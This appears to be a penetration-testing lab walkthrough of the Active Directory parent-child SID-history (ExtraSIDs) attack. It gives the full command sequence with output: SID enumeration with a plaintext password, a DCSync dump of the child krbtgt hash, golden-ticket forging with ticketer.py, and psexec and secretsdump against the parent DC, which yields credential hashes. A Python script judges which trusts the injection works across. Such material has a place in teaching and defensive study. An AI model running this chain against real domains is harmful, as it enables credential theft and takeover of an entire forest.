At a high level, a domain trust lets users in one domain authenticate to resources, or act as a security principal, in another domain. Within a single forest, parent-child trusts are two-way and transitive, and SID filtering is not applied to them; that is what the attack below abuses.

Parent-Child SID Injection Attack (ExtraSIDs / SID history)

This attack works once the child domain is compromised, specifically once we hold the child's krbtgt NT hash or AES key and can forge child tickets. Because the parent does not SID-filter tickets coming from a child domain, a forged child ticket whose ExtraSIDs (SID history) field carries the parent's Enterprise Admins SID (parent domain SID followed by -519) is accepted by the parent DC as an Enterprise Admin, which is full control of the forest.

Look up the child domain SID. lookupsid.py brute-forces RIDs over LSARPC; the value we need is the "Domain SID is" line (the S-1-5-21-... SID of OPS).

lookupsid.py ops.comply.com/pete@172.16.181.165

// Enter the password
0998ASDaas2

Output

[*] Brute forcing SIDs at 172.16.181.165
[*] StringBinding ncacn_np:172.16.181.165[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2032401531-514583578-4118054891
500: OPS\Administrator (SidTypeUser)
501: OPS\Guest (SidTypeUser)
502: OPS\krbtgt (SidTypeUser)
512: OPS\Domain Admins (SidTypeGroup)
513: OPS\Domain Users (SidTypeGroup)
514: OPS\Domain Guests (SidTypeGroup)
515: OPS\Domain Computers (SidTypeGroup)
516: OPS\Domain Controllers (SidTypeGroup)
517: OPS\Cert Publishers (SidTypeAlias)
520: OPS\Group Policy Creator Owners (SidTypeGroup)
521: OPS\Read-only Domain Controllers (SidTypeGroup)
522: OPS\Cloneable Domain Controllers (SidTypeGroup)
525: OPS\Protected Users (SidTypeGroup)
526: OPS\Key Admins (SidTypeGroup)
553: OPS\RAS and IAS Servers (SidTypeAlias)
571: OPS\Allowed RODC Password Replication Group (SidTypeAlias)
572: OPS\Denied RODC Password Replication Group (SidTypeAlias)
1000: OPS\CDC07$ (SidTypeUser)
1101: OPS\DnsAdmins (SidTypeAlias)
1102: OPS\DnsUpdateProxy (SidTypeGroup)
1103: OPS\COMPLY$ (SidTypeUser)
1104: OPS\pete (SidTypeUser)
1105: OPS\PROXY01$ (SidTypeUser)
1106: OPS\JUMP09$ (SidTypeUser)
1107: OPS\FILE06$ (SidTypeUser)
1108: OPS\FileAdmin (SidTypeGroup)
1109: OPS\nina (SidTypeUser)
1110: OPS\ForeignFileAdmin (SidTypeAlias)

Look up the parent domain SID, still authenticating as the child user pete (the trust lets a child account bind to the parent DC). Note that Enterprise Admins (RID 519) and Schema Admins (RID 518) appear only in this listing: they exist only in the forest root domain.

lookupsid.py ops.comply.com/pete@172.16.181.160

Output

[*] Brute forcing SIDs at 172.16.181.160
[*] StringBinding ncacn_np:172.16.181.160[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1135011135-3178090508-3151492220
498: COMPLY\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: COMPLY\Administrator (SidTypeUser)
501: COMPLY\Guest (SidTypeUser)
502: COMPLY\krbtgt (SidTypeUser)
512: COMPLY\Domain Admins (SidTypeGroup)
513: COMPLY\Domain Users (SidTypeGroup)
514: COMPLY\Domain Guests (SidTypeGroup)
515: COMPLY\Domain Computers (SidTypeGroup)
516: COMPLY\Domain Controllers (SidTypeGroup)
517: COMPLY\Cert Publishers (SidTypeAlias)
518: COMPLY\Schema Admins (SidTypeGroup)
519: COMPLY\Enterprise Admins (SidTypeGroup)
520: COMPLY\Group Policy Creator Owners (SidTypeGroup)
521: COMPLY\Read-only Domain Controllers (SidTypeGroup)
522: COMPLY\Cloneable Domain Controllers (SidTypeGroup)
525: COMPLY\Protected Users (SidTypeGroup)
526: COMPLY\Key Admins (SidTypeGroup)
527: COMPLY\Enterprise Key Admins (SidTypeGroup)
553: COMPLY\RAS and IAS Servers (SidTypeAlias)
571: COMPLY\Allowed RODC Password Replication Group (SidTypeAlias)
572: COMPLY\Denied RODC Password Replication Group (SidTypeAlias)
1000: COMPLY\RDC02$ (SidTypeUser)
1101: COMPLY\DnsAdmins (SidTypeAlias)
1102: COMPLY\DnsUpdateProxy (SidTypeGroup)
1103: COMPLY\nicky (SidTypeUser)
1104: COMPLY\OPS$ (SidTypeUser)
1105: COMPLY\COMPLYEDGE$ (SidTypeUser)

Dump the krbtgt NT hash from the child DC. --ntds pulls it through DRSUAPI replication, so pete needs replication (DCSync) rights or Domain Admin in ops.comply.com. secretsdump.py against the same DC also prints the krbtgt aes256-cts-hmac-sha1-96 key, which is needed for the AES variant below.

cme smb 172.16.181.165 -u pete -p 0998ASDaas2 --ntds -d ops.comply.com

Output

krbtgt:502:aad3b435b51404eeaad3b435b51404ee:7c7865e6e30e54e8845aad091b0ff447:::

Forge a golden ticket for the child domain with the parent's Enterprise Admins SID as ExtraSID. -domain and -domain-sid are the child's (ops.comply.com and S-1-5-21-2032401531-514583578-4118054891), -extra-sid is the parent domain SID from the previous listing with -519 appended. The ticket is issued for the child's Administrator (RID 500 by default in ticketer.py); the parent grants Enterprise Admin because of the injected SID, not because of the name.

ticketer.py -nthash 7c7865e6e30e54e8845aad091b0ff447 -domain ops.comply.com -domain-sid S-1-5-21-2032401531-514583578-4118054891 -extra-sid S-1-5-21-1135011135-3178090508-3151492220-519 Administrator

On newer, patched Windows builds a ticket forged from the RC4 NT hash is frequently rejected (RC4 disabled for Kerberos, or the tighter PAC checks that came with the November 2021 updates), so forge with the krbtgt AES256 key instead via -aesKey. The command below is the same attack from a different lab (corp.ghost.htb, not the comply.com environment above); the layout is identical: child domain and child SID, then <parent domain SID>-519 as the ExtraSID.

ticketer.py -aesKey b0eb79f35055af9d61bcbbe8ccae81d98cf63215045f7216ffd1f8e009a75e8d -domain corp.ghost.htb -domain-sid S-1-5-21-2034262909-2733679486-179904498 -extra-sid S-1-5-21-4084500788-938703357-3654145966-519 Administrator

Output

Impacket v0.12.0.dev1+20240308.164415.4a62f391 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for ops.comply.com/Administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncAsRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncASRepPart
[*] Saving ticket in Administrator.ccache

Export the forged ticket so the Impacket tools use it (point KRB5CCNAME at Administrator.ccache), then use it against the parent DC RDC02. Authenticate to the DC by hostname, so the service ticket's SPN (cifs/RDC02.comply.com) matches, and give the address with -target-ip.

psexec.py ops.comply.com/nicky@RDC02.comply.com -k -no-pass -target-ip 172.16.181.160
psexec.py ops.comply.com/Administrator@RDC02.comply.com -k -no-pass -target-ip 172.16.181.160
secretsdump.py ops.comply.com/Administrator@RDC02.comply.com -k -no-pass -target-ip 172.16.181.160

Output

Administrator:500:aad3b435b51404eeaad3b435b51404ee:069c3e9d2a2945f9f8c89457e395a949:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b03491290492036a4ce26d9221d8978b:::
comply.com\nicky:1103:aad3b435b51404eeaad3b435b51404ee:a71ad837cd4a6fcd8fd0fedc62c9b209:::
RDC02$:1000:aad3b435b51404eeaad3b435b51404ee:2c65002cf5e7b7ea0d05b06dbcb6a93e:::
OPS$:1104:aad3b435b51404eeaad3b435b51404ee:82a2b05513c42741c6ef06ac798b7cfb:::
COMPLYEDGE$:1105:aad3b435b51404eeaad3b435b51404ee:4549d11a9a6fbf035a9d94c8fa2435ff:::

That dump is the parent DC's NTDS, including the forest-root krbtgt hash, so the forest root is now fully compromised and every domain in the forest with it.

Enumerate trusts (PowerView)

Normally done before the attack: list the trusts visible from the compromised domain, with their direction and trustAttributes, to see which are intra-forest (WITHIN_FOREST) and which carry the QUARANTINED_DOMAIN flag (SID filtering), since injected SIDs only survive where filtering is off.

Get-DomainTrust -API
Get-DomainTrust -Domain comply.com
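As an added example (not from the notes and not PowerView code), the Python below decodes the trustAttributes and trustDirection values that Get-DomainTrust returns, using the bit definitions from MS-ADTS 6.1.6.7.9, and says for each trust whether a ticket carrying injected SIDs will be honoured. The sample trust records are constructed: the comply.com entry is what the child's trustedDomain object for its parent is assumed to look like, the other two are an ordinary forest trust and a quarantined external trust for comparison.

```python
"""Decode trustedDomain flags and judge whether ExtraSID injection survives
each trust. Added example; not from the notes, not PowerView. Sample records
are constructed (assumption: shape of a trustedDomain LDAP query result)."""
from __future__ import annotations

# trustAttributes bits (MS-ADTS 6.1.6.7.9)
TRUST_ATTRIBUTE_NON_TRANSITIVE = 0x00000001
TRUST_ATTRIBUTE_UPLEVEL_ONLY = 0x00000002
TRUST_ATTRIBUTE_QUARANTINED_DOMAIN = 0x00000004   # SID filtering enforced on this trust
TRUST_ATTRIBUTE_FOREST_TRANSITIVE = 0x00000008
TRUST_ATTRIBUTE_CROSS_ORGANIZATION = 0x00000010
TRUST_ATTRIBUTE_WITHIN_FOREST = 0x00000020        # parent-child or tree-root trust
TRUST_ATTRIBUTE_TREAT_AS_EXTERNAL = 0x00000040
TRUST_ATTRIBUTE_USES_RC4_ENCRYPTION = 0x00000080

FLAG_NAMES = {
    TRUST_ATTRIBUTE_NON_TRANSITIVE: "NON_TRANSITIVE",
    TRUST_ATTRIBUTE_UPLEVEL_ONLY: "UPLEVEL_ONLY",
    TRUST_ATTRIBUTE_QUARANTINED_DOMAIN: "QUARANTINED_DOMAIN",
    TRUST_ATTRIBUTE_FOREST_TRANSITIVE: "FOREST_TRANSITIVE",
    TRUST_ATTRIBUTE_CROSS_ORGANIZATION: "CROSS_ORGANIZATION",
    TRUST_ATTRIBUTE_WITHIN_FOREST: "WITHIN_FOREST",
    TRUST_ATTRIBUTE_TREAT_AS_EXTERNAL: "TREAT_AS_EXTERNAL",
    TRUST_ATTRIBUTE_USES_RC4_ENCRYPTION: "USES_RC4_ENCRYPTION",
}

# trustDirection values
TRUST_DIRECTION = {0: "Disabled", 1: "Inbound", 2: "Outbound", 3: "Bidirectional"}

# Constructed sample records. The first mirrors the page's child-to-parent trust
# (ops.comply.com -> comply.com); the others are there for comparison.
SAMPLE_TRUSTS = [
    {"name": "comply.com",      "trustDirection": 3, "trustAttributes": 0x20},
    {"name": "partner.example", "trustDirection": 3, "trustAttributes": 0x08},
    {"name": "legacy.example",  "trustDirection": 1, "trustAttributes": 0x04},
]


def decode_attributes(value: int) -> list[str]:
    """Names of the trustAttributes bits set in value, lowest bit first."""
    return [name for bit, name in sorted(FLAG_NAMES.items()) if value & bit]


def sid_history_honoured(attrs: int) -> tuple[bool, str]:
    """Will the receiving DC keep foreign SIDs in the ExtraSIDs of a ticket
    that crosses a trust with these attributes?"""
    if attrs & TRUST_ATTRIBUTE_QUARANTINED_DOMAIN:
        return False, "quarantine set: SID filtering strips SIDs not owned by the trusted domain"
    if attrs & TRUST_ATTRIBUTE_WITHIN_FOREST:
        return True, "intra-forest trust without quarantine: ExtraSIDs are honoured"
    if attrs & TRUST_ATTRIBUTE_FOREST_TRANSITIVE:
        return False, "forest trust: SID filtering is on by default, the other forest's RID-519 SID is dropped"
    return True, "external trust without the quarantine flag: SID filtering has been disabled"


def report(trusts: list[dict]) -> list[dict]:
    """One row per trust: decoded direction, flags and the ExtraSID verdict."""
    rows = []
    for t in trusts:
        ok, why = sid_history_honoured(t["trustAttributes"])
        rows.append({
            "name": t["name"],
            "direction": TRUST_DIRECTION.get(t["trustDirection"], "Unknown"),
            "flags": decode_attributes(t["trustAttributes"]),
            "extrasid_viable": ok,
            "reason": why,
        })
    return rows


if __name__ == "__main__":
    for row in report(SAMPLE_TRUSTS):
        verdict = "VIABLE" if row["extrasid_viable"] else "filtered"
        print(f"{row['name']:<18} {row['direction']:<14} "
              f"{','.join(row['flags']) or '-':<22} {verdict:<9} {row['reason']}")
```

SID filtering is enforced by the domain that receives the ticket, so for the child-to-parent direction the flags that matter are those on the parent's trustedDomain object for the child; query both sides when you can. For intra-forest trusts both sides show WITHIN_FOREST and, absent the quarantine flag, the attack on this page applies.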